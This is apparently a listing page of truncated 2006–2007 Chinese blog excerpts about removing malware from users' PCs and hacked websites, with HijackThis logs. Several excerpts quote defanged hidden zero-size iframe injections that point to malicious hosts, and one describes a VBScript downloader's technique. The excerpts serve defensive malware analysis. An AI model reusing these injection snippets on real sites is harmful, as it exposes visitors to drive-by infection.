其他

endurer 原創2006-11-20 第1版有位網友的電腦突然工作異常，雙擊案頭的表徵圖或點擊快速啟動欄上的按鈕表徵圖，彈出該表徵圖的屬性視窗，而不是運行相應的程式。讓我通過QQ的遠程協助協助檢修。該網友電腦使用的是 Win 2000 Pro SP4。右擊工作列，選擇工作管理員，切換到進程頁，發現一個比較少見的進程：SafeSignCertReg.exe。到 http://endurer.ys168.com 下載

endurer 原創2006-11-17 第1版有位網友的電腦，這兩天瑞星總發現灰鴿子。在該網友發來的HijackThis的log發現如下可疑項：/-------O2 - BHO: Java Class - {38CE3843-4420-4AA8-A129-F9E771B4561B} - C:/WINDOWS/java/classes/java.dllO20 - AppInit_DLLs: kernel32.sys-------/用WinRAR檢查：C:/Documents and

endurer 原創2006-12-08 第1版昨天繼續幫那位遭遇www.6781.com劫持瀏覽器和Worm.Snake.a等的網友處理。見:遭遇www.6781.com劫持瀏覽器和Worm.Snake.a等http://endurer.bokee.com/5914250.html那位網友已經安裝了瑞星殺毒軟體2006下載版，上回列出的幾個檔案都找不到了。但IE首頁還會被改為www.6781.com。再用HijackThis產生啟動項列表，發現可疑服務/-----------msqmx: /?

endurer 原創2006-11-13 第1版昨晚，一位網友的電腦，瑞星不停地報告發現木馬Trojan.PSW.WoWar.qq，檔案為C:/WINDOWS/system32/dllms.dll，點擊清除按鈕，瑞星則提示下次啟動時刪除。讓偶幫忙檢查。從 http://endurer.ys168.com 下載 HijackThis掃描 log，發現如下可疑項目：/--------Logfile of HijackThis v1.99.1Scan saved at 22:03:23, on 200

endurer 原創2007-01-26 第1版一位網友說他的電腦最近工作速度很慢，讓偶通過QQ遠程協助幫忙檢修看看。到 http://endurer.ys168.com 下載 HijackThis掃描log，發現可疑項：/------Logfile of HijackThis v1.99.1Scan saved at 15:11:51, on 2007-1-26Platform: Windows XP SP2 (WinNT 5.01.2600)MSIE: Internet Explorer

endurer　原創2006-07-19　第5版　補充殺毒軟體的反應。2006-07-17　第4版　補充殺毒軟體的反應。2006-07-14　第3版　補充殺毒軟體的反應。2006-07-13　第2版　補充殺毒軟體的反應，在該網友電腦的其它盤發現的惡意程式。2006-07-12　第1版　　昨天有網友說他的電腦中的瑞星每次開機自動掃描總是報告發現灰鴿子，即時監控總發現並成功刪除Rootkit.Vanti.gen的檔案C:/WINDOWS/Tempkqmbz78.dll。如： ------------

endurer 原創2007-01-06 第2版 補充 Kaspersky 的反應2006-12-27 第1版該網站首頁被加入代碼：/-------...<iframe src=hxxp://www..xj123***.net/ad***/*1***/*1 width=0 height=0 frameborder=0></iframe>-------/開啟 hxxp://www..xj123***.net/ad***/*1***/*1  會自動轉到hxxp://i***.

endurer　原創2006-08-21　第1版網站首頁插入如下代碼：/------------＜iframe src="hxxp://www.ac***66.cn/8***8/index.htm" width="0" height="0" frameborder="0"＞＜/iframe＞------------/hxxp://www.ac***66.cn/8***8/index.htm 的內容為：/--------＜SCRIPT language="JavaScript"＞function

endurer　原創2006-08-13　第1版一位網友的電腦，這兩天瑞星開機掃描總報告發現Backdoor.Gpigeon.uql。如：------------病毒名稱 處理結果 發現日期 路徑檔案病毒來源Backdoor.Gpigeon.uql 清除成功  2006-08-13 10:08 IEXPLORE.EXE>>C:/Program Files/Internet Explorer/IEXPLORE.EXE本機------------使用HijackThis（可以到

;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<; 檔案名稱: rar_path.asm; 功　能: 擷取並顯示WinRAR的路徑

endurer　原創2006-08-20 第1版一位網友的電腦，這兩天瑞星開機掃描總報告發現Backdoor.Gpigeon.uql。如：/------------病毒名稱 處理結果 發現日期 路徑檔案病毒來源Backdoor.Gpigeon.uql 清除成功  2006-08-19 13:58 IEXPLORE.EXE>>C:/Program Files/Internet Explorer/IEXPLORE.EXE本機------------/ 使用HijackThis（可以到

endurer　原創2006-05-04　第1版某網站被加入：  ＜iframe src="hxxp://95762.***512j.com/" width="0" height="0"＞   hxxp://95762.***512j.com/index的內容為:  ＜iframe src="hxxp://www.***kkkshop.com/images/index.htm" width="0"

endurer 原創2007-06-27

endurer　原創2006-08-18　第1版　　有網友反映，他所在的公司的區域網路上的所有電腦中的共用文檔都會產生MicrosoftSQL.exe，用瑞星未查殺，刪除又會產生。並把MicrosoftSQL.exe發給我。　　看了一下，檔案MicrosoftSQL.exe（Kaspersky 報為

endurer　原創2006-08-18　第1版開啟這兩個網站時，Kaspersky 提示發現 Exploit.JS.ADODB.stream.e。第一個網站 hxxp://www.jing***.gov.cn的首頁加入代碼：--------＜TR＞＜script language=javascript src=bbs.js＞＜/script＞＜TD vAlign=top align=right

endurer 原創2006-12-09 第1版QQ收到如下資訊：/--------www.hrb**wht.com/123***.html這裡有我的照片大家去看下順便給個評價謝謝了 --------/該網頁的內容為使用自訂函數UnEncode()加密的VBScript指令碼程式，如果啟動並執行話可以看到作者的QQ號和“You DO it!”的資訊。其功能是利用利用 Scripting.FileSystemObject、Microsoft.XMLHTTP、Adodb.Stream 下載檔案 12

endurer 原創2007-02-16 第1版 昨天一位朋友的電腦發現了熊貓燒香病毒，過去一看，這個國寶藏在共用資料夾裡的EXE檔案。  Scanned file:   Games.VIR000 - Infected Games.VIR000 - infected by Worm.Win32.Viking.bb Statistics:Known viruses:268054Updated:15-02-2007File size (Kb):101Virus

　　大家常常會遇到一種情形，那就是當Word打到一半的時候，此時電腦當機了 ，如果很久沒有存檔 ，那真是欲哭無淚，所以在此告訴大家一個小秘方。　　當電腦突然死機或斷電時，Word中來不及存檔的檔案，他會暫時存放在C://Documents and Settings//Administrator//Application Data//Microsoft//Word ，找到未儲存，突然斷電？找回死機後未儲存的Word所以重開機時只要到上述的地方 ，找個檔名為ＸＸＸ.asd

作者： techrepublic.com.comNTFS和共用層級許可權都將影響使用者擷取網上資源的能力。應該對兩者的特點和需要解決的問題做一個很好的瞭解。 系統管理權限問題和排除許可權方面故障的工作非常具有挑戰性，尤其是當所有的事情看來似乎都很正常的時候。這些提示和經驗將協助使用者避免某些常見難題。 NTFS與共用許可權 關於Windows系統共用問題最大的困擾是，NTFS和共用層級許可權都會影響使用者訪問網路資源的能力。需要強調的是在Windows XP、Windows server 200

endurer　原創2006-09-05 第2版2006-08-30 第1版有一位網友的電腦，不定期彈出 hxxp://www.71791.com 等廣告視窗。使用HijackThis（可以到 http://endurer.ys168.com 下載）掃描log，發現可疑項：/-----------Logfile of HijackThis v1.99.1Scan saved at 21:32:36, on 2006-8-29Platform: Windows XP SP1 (WinNT 5.01